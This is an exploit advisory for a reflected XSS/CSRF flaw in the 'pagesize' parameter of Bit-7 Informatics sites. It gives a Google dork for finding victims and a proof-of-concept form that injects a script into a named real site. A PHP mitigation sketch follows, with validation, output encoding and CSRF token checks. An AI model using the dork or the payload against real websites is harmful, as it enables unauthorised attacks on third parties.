Powered By Bit-7 Informatics CSRF XSS

2016.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Powered By Bit-7 Informatics CSRF XSS
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.bit7informatics.com/
# Google Dork : "intext:Powered By : Bit-7 Informatics" inurl:.php?id=
# Date: 2016/02/12
#
######################
# Vulnerable PHP File : /download.php
#                       /gallery.php
#                       /news.php
#
# Vulnerable Parameter : pagesize
# Exploit :
#
#<form id="form1" name="form1" method="post" action="http://dsaindia.org/news.php">
#	<input name="pagesize" id="pagesize" value='"><script>alert("Mobham")</script>' />
#	<input type="hidden" name="page" id="txtcpage" value="" />
#	<input type="submit" value="GO!!">
# </form>
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
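
A mitigation sketch for the `pagesize` issue above, added here as an example and not taken from the advisory or from the vendor's code. It assumes the page reflects the POSTed `pagesize` into an `<input value="...">` attribute; the function names, the allowed sizes and the `csrf_token` field are hypothetical.

```php
<?php
// Added example: hypothetical hardening for a page that reflects the POSTed
// "pagesize" value into an HTML attribute. All names here are assumptions.

const ALLOWED_PAGE_SIZES = [10, 25, 50, 100]; // assumed set of valid sizes
const DEFAULT_PAGE_SIZE  = 10;

// Input validation: pagesize is a number, so accept nothing else.
function clean_page_size($raw): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    return ($n !== false && in_array($n, ALLOWED_PAGE_SIZES, true))
        ? $n
        : DEFAULT_PAGE_SIZE;
}

// Output encoding for an attribute context: quotes and angle brackets
// become entities, so a value cannot close the attribute or the tag.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Cross-site POSTs carry no per-session token, so they are ignored.
function csrf_ok(array $post, array $session): bool
{
    $sent   = $post['csrf_token'] ?? null;
    $stored = $session['csrf_token'] ?? null;
    return is_string($sent) && is_string($stored) && hash_equals($stored, $sent);
}

function render_pager(array $post, array $session): string
{
    $size = csrf_ok($post, $session)
        ? clean_page_size($post['pagesize'] ?? null)
        : DEFAULT_PAGE_SIZE;
    return '<input name="pagesize" id="pagesize" value="'
        . attr((string) $size) . '" />';
}

// Constructed input: the value from the advisory's form, sent without a token.
$token = bin2hex(random_bytes(16));
$post  = ['pagesize' => '"><script>alert("Mobham")</script>', 'page' => ''];
echo render_pager($post, ['csrf_token' => $token]), "\n";

// The same value with a valid token still fails the integer check.
$post['csrf_token'] = $token;
echo render_pager($post, ['csrf_token' => $token]), "\n";
```

Both calls emit the default size; the integer check alone blocks this value, and the encoding step covers any other string the same template might reflect.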

